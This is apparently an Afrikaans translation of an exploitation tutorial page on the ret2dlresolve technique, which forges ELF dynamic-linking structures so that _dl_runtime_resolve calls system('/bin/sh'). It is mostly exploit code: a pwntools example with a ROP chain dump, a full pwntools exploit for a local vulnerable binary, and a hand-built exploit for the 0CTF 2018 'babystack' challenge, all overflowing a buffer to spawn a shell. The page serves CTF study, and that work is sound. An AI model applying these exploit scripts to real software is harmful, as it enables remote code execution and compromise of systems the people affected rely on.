Soos verduidelik op die bladsy oor GOT/PLT en Relro, binaries sonder Volle Relro sal simbole (soos adresse na eksterne biblioteke) die eerste keer wat hulle gebruik word, oplos. Hierdie oplosproses gebeur deur die funksie _dl_runtime_resolve aan te roep.
Die _dl_runtime_resolve funksie neem vanaf die stapel verwysings na 'n paar strukture wat dit nodig het om die gespesifiseerde simbool te resolveer.
Daarom is dit moontlik om al hierdie strukture te vervals om die dinamies gekoppelde simbool (soos die system funksie) te laat oplos en dit met 'n geconfigureerde parameter aan te roep (bv. system('/bin/sh')).
Gewoonlik word al hierdie strukture vervals deur 'n begin ROP-ketting wat read aanroep oor 'n skryfbare geheue, dan word die strukture en die string '/bin/sh' oorgedra sodat dit deur read in 'n bekende ligging gestoor word, en dan gaan die ROP-ketting voort deur _dl_runtime_resolve aan te roep, wat die adres van system in die vervalste strukture oplos en hierdie adres aanroep met die adres na $'/bin/sh'.
Hierdie tegniek is veral nuttig as daar nie syscall gadgets is (om tegnieke soos ret2syscall of SROP te gebruik nie) en daar nie maniere is om libc adresse te lek nie.
Kyk na hierdie video vir 'n goeie verduideliking oor hierdie tegniek in die tweede helfte van die video:
Of kyk na hierdie bladsye vir 'n stap-vir-stap verduideliking:
context.binary = elf =ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))>>> rop =ROP(elf)>>> dlresolve =Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])>>> rop.read(0, dlresolve.data_addr)# do not forget this step, but use whatever function you like>>> rop.ret2dlresolve(dlresolve)>>> raw_rop = rop.chain()>>>print(rop.dump())0x0000:0x400593 pop rdi; ret0x0008:0x0 [arg0] rdi =00x0010:0x400591 pop rsi; pop r15; ret0x0018:0x601e00 [arg1] rsi =62991360x0020:b'iaaajaaa'<pad r15>0x0028:0x4003f0 read0x0030:0x400593 pop rdi; ret0x0038:0x601e48 [arg0] rdi =62992080x0040:0x4003e0 [plt_init] system0x0048:0x15670 [dlresolve index]
Voorbeeld
Pure Pwntools
Jy kan 'n voorbeeld van hierdie tegniek hiervind wat 'n baie goeie verduideliking van die finale ROP-ketting bevat, maar hier is die finale exploit wat gebruik is:
from pwn import*elf = context.binary =ELF('./vuln', checksec=False)p = elf.process()rop =ROP(elf)# create the dlresolve objectdlresolve =Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop.raw('A'*76)rop.read(0, dlresolve.data_addr)# read to where we want to write the fake structuresrop.ret2dlresolve(dlresolve)# call .plt and dl-resolve() with the correct, calculated reloc_offsetlog.info(rop.dump())p.sendline(rop.chain())p.sendline(dlresolve.payload)# now the read is called and we pass all the relevant structures inp.interactive()
Roue
# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystackfrom pwn import*target =process('./babystack')#gdb.attach(target)elf =ELF('babystack')# Establish starts of various sectionsbss =0x804a020dynstr =0x804822cdynsym =0x80481ccrelplt =0x80482b0# Establish two functionsscanInput =p32(0x804843b)resolve =p32(0x80482f0)#dlresolve address# Establish size of second payloadpayload1_size =43# Our first scan# This will call read to scan in our fake entries into the plt# Then return back to scanInput to re-exploit the bugpayload0 =""payload0 +="0"*44# Filler from start of input to return addresspayload0 +=p32(elf.symbols['read'])# Return readpayload0 += scanInput # After the read call, return to scan inputpayload0 +=p32(0)# Read via stdinpayload0 +=p32(bss)# Scan into the start of the bsspayload0 +=p32(payload1_size)# How much data to scan intarget.send(payload0)# Our second scan# This will be scanned into the start of the bss# It will contain the fake entries for our ret_2_dl_resolve attack# Calculate the r_info value# It will provide an index to our dynsym entrydynsym_offset = ((bss +0xc) - dynsym) /0x10r_info = (dynsym_offset <<8) |0x7# Calculate the offset from the start of dynstr section to our dynstr entrydynstr_index = (bss +28) - dynstrpaylaod1 =""# Our .rel.plt entrypaylaod1 +=p32(elf.got['alarm'])paylaod1 +=p32(r_info)# Emptypaylaod1 +=p32(0x0)# Our dynsm entrypaylaod1 +=p32(dynstr_index)paylaod1 +=p32(0xde)*3# Our dynstr entrypaylaod1 +="system\x00"# Store "/bin/sh" here so we can have a pointer ot itpaylaod1 +="/bin/sh\x00"target.send(paylaod1)# Our third scan, which will execute the ret_2_dl_resolve# This will just call 0x80482f0, which is responsible for calling the functions for resolving# We will pass it the `.rel.plt` index for our fake entry# As well as the arguments for system# Calculate address of "/bin/sh"binsh_bss_address = bss +35# Calculate the .rel.plt offsetret_plt_offset = bss - relpltpaylaod2 =""paylaod2 +="0"*44paylaod2 += resolve # 0x80482f0paylaod2 +=p32(ret_plt_offset)# .rel.plt offsetpaylaod2 +=p32(0xdeadbeef)# The next return address after 0x80482f0, really doesn't matter for uspaylaod2 +=p32(binsh_bss_address)# Our argument, address of "/bin/sh"target.send(paylaod2)# Enjoy the shell!target.interactive()
32bit, geen relro, geen canary, nx, geen pie, basiese klein buffer overflow en terugkeer. Om dit te benut, word die bof gebruik om read weer aan te roep met 'n .bss afdeling en 'n groter grootte, om daarin die dlresolve vals tabelles te stoor om system te laai, terug te keer na hoof en die aanvanklike bof weer te misbruik om dlresolve aan te roep en dan system('/bin/sh').